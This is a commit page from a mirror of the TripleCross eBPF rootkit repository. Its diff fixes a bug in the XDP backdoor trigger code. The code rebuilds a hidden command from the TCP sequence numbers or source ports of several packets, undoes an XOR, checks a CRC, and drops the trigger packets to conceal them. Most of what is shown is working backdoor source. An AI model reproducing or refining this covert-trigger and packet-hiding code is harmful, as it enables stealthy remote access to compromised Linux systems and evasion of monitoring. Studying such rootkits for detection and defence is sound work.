admin/TripleCross
1
0
Fork 0
mirror of https://github.com/h3xduck/TripleCross.git synced 2025-12-16 23:33:06 +08:00
Code Issues Packages Projects Releases Wiki Activity

Fixed a bug where tcpport mode in the multi-packet backdoor did not work if a previous trigger using seqnum mode was made

Browse Source
This commit is contained in:
h3xduck
2022-05-18 12:45:35 -04:00
parent 104f4c0355
commit 3e697dd4cf
5 changed files with 12711 additions and 12298 deletions
Download Patch File Download Diff File Expand all files Collapse all files

BIN
src/.output/kit.o
View File

Binary file not shown.

24923
src/.output/kit.skel.h
View File

File diff suppressed because it is too large Load Diff

BIN
src/bin/kit
View File

Binary file not shown.

84
src/ebpf/include/xdp/backdoor.h
View File

@@ -201,32 +201,33 @@ static __always_inline int manage_backdoor_trigger_v3_32(struct backdoor_packet_
//The following routine (not just the next check) is necessarily dirty in terms of programming,
//but the ebpf verifier strongly dislikes MOD operations (check report, screenshot)
char payload[CC_STREAM_TRIGGER_PAYLOAD_LEN_MODE_SEQ_NUM] = {0};
int p_index = 0;
if(first_packet == 0){
for(int ii=first_packet; ii<3; ii++){
for(int ii=first_packet; ii<3; ii++, p_index++){
__u32 seq_num = b_data.trigger_array[ii].seq_raw;
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SEQ_NUM*ii), &(seq_num), sizeof(__u32));
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SEQ_NUM*p_index), &(seq_num), sizeof(__u32));
}
for(int ii=0; ii<first_packet; ii++){
for(int ii=0; ii<first_packet; ii++, p_index++){
__u32 seq_num = b_data.trigger_array[ii].seq_raw;
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SEQ_NUM*ii), &(seq_num), sizeof(__u32));
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SEQ_NUM*p_index), &(seq_num), sizeof(__u32));
}
}else if(first_packet == 1){
for(int ii=first_packet; ii<3; ii++){
for(int ii=first_packet; ii<3; ii++, p_index++){
__u32 seq_num = b_data.trigger_array[ii].seq_raw;
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SEQ_NUM*ii), &(seq_num), sizeof(__u32));
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SEQ_NUM*p_index), &(seq_num), sizeof(__u32));
}
for(int ii=0; ii<first_packet; ii++){
for(int ii=0; ii<first_packet; ii++, p_index++){
__u32 seq_num = b_data.trigger_array[ii].seq_raw;
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SEQ_NUM*ii), &(seq_num), sizeof(__u32));
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SEQ_NUM*p_index), &(seq_num), sizeof(__u32));
}
}else if(first_packet == 2){
for(int ii=first_packet; ii<3; ii++){
for(int ii=first_packet; ii<3; ii++, p_index++){
__u32 seq_num = b_data.trigger_array[ii].seq_raw;
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SEQ_NUM*ii), &(seq_num), sizeof(__u32));
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SEQ_NUM*p_index), &(seq_num), sizeof(__u32));
}
for(int ii=0; ii<first_packet; ii++){
for(int ii=0; ii<first_packet; ii++, p_index++){
__u32 seq_num = b_data.trigger_array[ii].seq_raw;
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SEQ_NUM*ii), &(seq_num), sizeof(__u32));
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SEQ_NUM*p_index), &(seq_num), sizeof(__u32));
}
}
@@ -321,71 +322,72 @@ static __always_inline int manage_backdoor_trigger_v3_16(struct backdoor_packet_
}else{
first_packet = 0;
}
bpf_printk("BACKDOOR 16: FP:%i, LR:%i\n", first_packet, last_received);
//The following routine is necessarily dirty in terms of programming,
//but the ebpf verifier strongly dislikes MOD operations (check report, screenshot)
char payload[CC_STREAM_TRIGGER_PAYLOAD_LEN_MODE_SRC_PORT] = {0};
int p_index = 0;
if(first_packet == 0){
for(int ii=first_packet; ii<6; ii++){
for(int ii=first_packet; ii<6; ii++, p_index++){
__u16 src_port = b_data.trigger_array[ii].src_port;
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*ii), &(src_port), sizeof(__u16));
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*p_index), &(src_port), sizeof(__u16));
}
for(int ii=0; ii<first_packet; ii++){
for(int ii=0; ii<first_packet; ii++, p_index++){
__u16 src_port = b_data.trigger_array[ii].src_port;
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*ii), &(src_port), sizeof(__u16));
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*p_index), &(src_port), sizeof(__u16));
}
}else if(first_packet == 1){
for(int ii=first_packet; ii<6; ii++){
for(int ii=first_packet; ii<6; ii++, p_index++){
__u16 src_port = b_data.trigger_array[ii].src_port;
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*ii), &(src_port), sizeof(__u16));
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*p_index), &(src_port), sizeof(__u16));
}
for(int ii=0; ii<first_packet; ii++){
for(int ii=0; ii<first_packet; ii++, p_index++){
__u16 src_port = b_data.trigger_array[ii].src_port;
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*ii), &(src_port), sizeof(__u16));
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*p_index), &(src_port), sizeof(__u16));
}
}else if(first_packet == 2){
for(int ii=first_packet; ii<6; ii++){
for(int ii=first_packet; ii<6; ii++, p_index++){
__u16 src_port = b_data.trigger_array[ii].src_port;
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*ii), &(src_port), sizeof(__u16));
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*p_index), &(src_port), sizeof(__u16));
}
for(int ii=0; ii<first_packet; ii++){
for(int ii=0; ii<first_packet; ii++, p_index++){
__u16 src_port = b_data.trigger_array[ii].src_port;
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*ii), &(src_port), sizeof(__u16));
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*p_index), &(src_port), sizeof(__u16));
}
}else if(first_packet == 3){
for(int ii=first_packet; ii<6; ii++){
for(int ii=first_packet; ii<6; ii++, p_index++){
__u16 src_port = b_data.trigger_array[ii].src_port;
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*ii), &(src_port), sizeof(__u16));
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*p_index), &(src_port), sizeof(__u16));
}
for(int ii=0; ii<first_packet; ii++){
for(int ii=0; ii<first_packet; ii++, p_index++){
__u16 src_port = b_data.trigger_array[ii].src_port;
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*ii), &(src_port), sizeof(__u16));
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*p_index), &(src_port), sizeof(__u16));
}
}else if(first_packet == 4){
for(int ii=first_packet; ii<6; ii++){
for(int ii=first_packet; ii<6; ii++, p_index++){
__u16 src_port = b_data.trigger_array[ii].src_port;
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*ii), &(src_port), sizeof(__u16));
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*p_index), &(src_port), sizeof(__u16));
}
for(int ii=0; ii<first_packet; ii++){
for(int ii=0; ii<first_packet; ii++, p_index++){
__u16 src_port = b_data.trigger_array[ii].src_port;
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*ii), &(src_port), sizeof(__u16));
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*p_index), &(src_port), sizeof(__u16));
}
}else if(first_packet == 5){
for(int ii=first_packet; ii<6; ii++){
for(int ii=first_packet; ii<6; ii++, p_index++){
__u16 src_port = b_data.trigger_array[ii].src_port;
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*ii), &(src_port), sizeof(__u16));
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*p_index), &(src_port), sizeof(__u16));
}
for(int ii=0; ii<first_packet; ii++){
for(int ii=0; ii<first_packet; ii++, p_index++){
__u16 src_port = b_data.trigger_array[ii].src_port;
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*ii), &(src_port), sizeof(__u16));
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*p_index), &(src_port), sizeof(__u16));
}
}
/*bpf_printk("Payload before XOR: ");
bpf_printk("Payload before XOR: ");
for(int ii=0; ii<CC_STREAM_TRIGGER_PAYLOAD_LEN_MODE_SRC_PORT; ii++){
bpf_printk("%x", payload[ii]);
}
bpf_printk("\n");*/
bpf_printk("\n");
//Now that we have the possible complete stream, let's search for the secret backdoor combination in it
//First undo running XOR
@@ -394,11 +396,11 @@ static __always_inline int manage_backdoor_trigger_v3_16(struct backdoor_packet_
__builtin_memcpy(payload+ii, (char*)&(xor_res), 0x01);
}
/*bpf_printk("Payload after XOR: ");
bpf_printk("Payload after XOR: ");
for(int ii=0; ii<CC_STREAM_TRIGGER_PAYLOAD_LEN_MODE_SRC_PORT; ii++){
bpf_printk("%x", payload[ii]);
}
bpf_printk("\n");*/
bpf_printk("\n");
//Now compute CRC
__u8 x;

2
src/ebpf/kit.bpf.c
View File

@@ -214,6 +214,7 @@ int xdp_receive(struct xdp_md *ctx){
//where for other purpose, we must still check it)
int ret = manage_backdoor_trigger_v3_32(b_new_data_32);
if(ret == 1){
//The packet was for the backdoor, better hide it
return XDP_DROP;
}
}
@@ -227,7 +228,6 @@ int xdp_receive(struct xdp_md *ctx){
bpf_map_update_elem(&backdoor_packet_log_32, &ipvalue, &b_new_data_32, BPF_ANY);
}
////16 bit 6-len streams
struct backdoor_packet_log_data_16 *b_data_16 = (struct backdoor_packet_log_data_16*) bpf_map_lookup_elem(&backdoor_packet_log_16, &ipvalue);
struct backdoor_packet_log_data_16 b_new_data_16 = {0};